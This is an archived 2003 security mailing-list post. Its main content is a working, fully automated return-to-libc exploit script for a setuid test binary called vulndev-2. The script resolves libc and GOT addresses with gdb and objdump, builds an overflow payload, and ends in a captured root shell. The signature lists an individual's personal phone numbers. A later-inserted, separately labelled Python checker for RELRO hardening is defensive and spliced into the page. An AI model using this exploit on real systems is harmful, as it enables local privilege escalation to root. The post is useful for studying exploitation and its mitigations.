Spacewalker and others who did a return-to-libc sploit for vulndev-2.

Returning to system() means your command will be executed like this:

    /bin/sh -c blabla

In Linux, /bin/sh is a symlink to bash. Recent versions of bash reset the
EUID to the real UID. Many other shells also reset the EUID, since it's
pretty common to execute /bin/sh in sploits (that's why shellcodes usually
include a setuid-call before the exec, you know).

Jon Erickson AKA Jose Ronnick exploited it "for real" though, and here's
yet another working return-to-libc exploit, which uses a different
approach. As usual, the sploit is fully automated.

[je@vudo ~]$ cat expldev-2.sh
#!/bin/sh
#
# Linux/x86 exploit for vulndev-2. Version 2 (return-to-libc).
#
# 2003-05-25 - Joel Eriksson (je at 0xbadc0ded.org)
#

[ $# -ge 1 ] && vul=$1 || vul=./vulndev-2 ; shift

cat > expldev-2.c << EOF
#include <stdio.h>
#include <unistd.h>
#include <errno.h>

int main(void) {
    setreuid(0, 0);
    execl("/bin/sh", "sh", NULL);
    perror("exec");
    return 1;
}
EOF

gcc -o '%s ' expldev-2.c

buf_size=90   # size of buffer
pad_size=2    # align to word boundary
num_reps=32   # &bfp - &buf may be > BFSIZE (padding/alignment)

cp $vul $vul.tmp   # Can't trace a SUID-binary, so use a temporary file.

cat > expldev-2.gdb << EOF
file $vul.tmp
b main
r
p/x &execv
q
EOF

addr_printf=0x$(objdump -R $vul | awk '$3 == "printf" { print $1 }')
addr_execv=$(gdb -q -x expldev-2.gdb | sed -n '$,$s/.* = //p')

rm -f expldev-2.gdb $vul.tmp

perl -e 'print "\0\0\0\0" . pack("L", '$[addr_execv]')' > db.log

arg1=$(perl -e ' print "A" x ('$[buf_size + pad_size]') .
                 pack("L", '$[addr_printf - 4]') x '$num_reps )

$vul $arg1 ""

[je@vudo ~]$ ./expldev-2.sh
sh-2.05b# whoami
root
sh-2.05b# exit
exit
[je@vudo ~]$

--
Joel Eriksson -------------------------------------------------
Cellphone: +46-70-288 64 16      Home: +46-26-10 23 37
Security Research & Systems Development at Bitnux
PGP Key Server pgp.mit.edu, PGP Key ID 0x529FDBD1
A615 A1E1 3CA2 D7C2 CFEA 47B4 7EF7 E6B2 529F DBD1
-------------------------------------------------
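The primitive the post relies on is that the printf GOT slot (the JUMP_SLOT entry objdump -R lists) is still writable when the overwrite lands. The build-time mitigation for exactly that is full RELRO: a PT_GNU_RELRO segment together with BIND_NOW, so every GOT entry is resolved at startup and the GOT is then mapped read-only, and a write to printf's slot faults instead of redirecting the call to execv. The checker below is an added example, not part of the original post or of Joel Eriksson's exploit: it parses a binary's program headers and dynamic section and reports "full", "partial" or "none", for ELF32 and ELF64 in either byte order, which goes beyond the 32-bit Linux case the post shows. All function and constant names are my own, and build_sample_elf() produces a constructed, non-loadable ELF image so the checker can be exercised offline.

```python
"""Report whether an ELF binary's GOT is protected by RELRO (added example)."""
import struct

# Program-header types and dynamic-section tags/flags from the ELF ABI.
PT_DYNAMIC = 2
PT_GNU_RELRO = 0x6474E552
DT_NULL = 0
DT_FLAGS = 0x1E
DT_FLAGS_1 = 0x6FFFFFFB
DF_BIND_NOW = 0x8
DF_1_NOW = 0x1


def _program_headers(data):
    """Return (is64, byte-order prefix, [(p_type, p_offset, p_filesz), ...])."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = data[4] == 2                     # EI_CLASS: 1 = ELF32, 2 = ELF64
    end = "<" if data[5] == 1 else ">"      # EI_DATA:  1 = little, 2 = big
    if is64:
        (e_phoff,) = struct.unpack_from(end + "Q", data, 0x20)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 0x36)
    else:
        (e_phoff,) = struct.unpack_from(end + "I", data, 0x1C)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 0x2A)
    headers = []
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if is64:  # Elf64_Phdr: type, flags, offset, vaddr, paddr, filesz, ...
            p_type, _, p_offset, _, _, p_filesz = struct.unpack_from(end + "IIQQQQ", data, off)
        else:     # Elf32_Phdr: type, offset, vaddr, paddr, filesz, ...
            p_type, p_offset, _, _, p_filesz = struct.unpack_from(end + "IIIII", data, off)
        headers.append((p_type, p_offset, p_filesz))
    return is64, end, headers


def _dynamic_flags(data, is64, end, p_offset, p_filesz):
    """Walk the PT_DYNAMIC array and return the (DT_FLAGS, DT_FLAGS_1) values."""
    fmt = end + ("qQ" if is64 else "iI")   # d_tag is signed, d_val unsigned
    size = struct.calcsize(fmt)
    flags = flags1 = 0
    for off in range(p_offset, p_offset + p_filesz, size):
        d_tag, d_val = struct.unpack_from(fmt, data, off)
        if d_tag == DT_NULL:
            break
        if d_tag == DT_FLAGS:
            flags = d_val
        elif d_tag == DT_FLAGS_1:
            flags1 = d_val
    return flags, flags1


def relro_state(data):
    """Classify GOT protection of an ELF image held in memory.

    'full'    - PT_GNU_RELRO present and BIND_NOW set: all GOT slots are resolved
                at startup and then made read-only, so an overwrite faults.
    'partial' - PT_GNU_RELRO present but lazy binding: .got.plt stays writable.
    'none'    - no RELRO segment at all.
    """
    is64, end, headers = _program_headers(data)
    has_relro = any(p_type == PT_GNU_RELRO for p_type, _, _ in headers)
    bind_now = False
    for p_type, p_offset, p_filesz in headers:
        if p_type == PT_DYNAMIC:
            flags, flags1 = _dynamic_flags(data, is64, end, p_offset, p_filesz)
            bind_now = bool(flags & DF_BIND_NOW or flags1 & DF_1_NOW)
    if has_relro and bind_now:
        return "full"
    return "partial" if has_relro else "none"


def build_sample_elf(bits=64, relro=True, bind_now=True, little=True):
    """Constructed sample (not loadable): ELF header, a PT_DYNAMIC program header,
    an optional PT_GNU_RELRO header, and a two-entry dynamic array."""
    end = "<" if little else ">"
    ehdr_size, phent, dyn_fmt = (64, 56, "qQ") if bits == 64 else (52, 32, "iI")
    types = [PT_DYNAMIC] + ([PT_GNU_RELRO] if relro else [])
    dyn_off = ehdr_size + len(types) * phent
    dyn = struct.pack(end + dyn_fmt, DT_FLAGS, DF_BIND_NOW) if bind_now else b""
    dyn += struct.pack(end + dyn_fmt, DT_NULL, 0)
    ident = b"\x7fELF" + bytes([2 if bits == 64 else 1, 1 if little else 2, 1]) + b"\0" * 9
    # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags, e_ehsize,
    # e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    fields = (2, 62 if bits == 64 else 3, 1, 0, ehdr_size, 0, 0,
              ehdr_size, phent, len(types), 0, 0, 0)
    ehdr = ident + struct.pack(end + ("HHIQQQIHHHHHH" if bits == 64 else "HHIIIIIHHHHHH"), *fields)
    phdrs = b""
    for p_type in types:
        off, size = (dyn_off, len(dyn)) if p_type == PT_DYNAMIC else (0, 0)
        if bits == 64:
            phdrs += struct.pack(end + "IIQQQQQQ", p_type, 6, off, off, off, size, size, 8)
        else:
            phdrs += struct.pack(end + "IIIIIIII", p_type, off, off, off, size, size, 6, 4)
    return ehdr + phdrs + dyn


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            print(path, relro_state(f.read()))
```

Run it as `python3 relro_check.py /path/to/binary` to audit real files; "partial" is the common default on many distributions, and only "full" takes the GOT-overwrite primitive away. Toolchains may record BIND_NOW in DT_FLAGS, DT_FLAGS_1 or both, which is why the checker looks at both tags.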
This archive was generated by hypermail 2b30 : Sun May 25 2003 - 20:15:22 PDT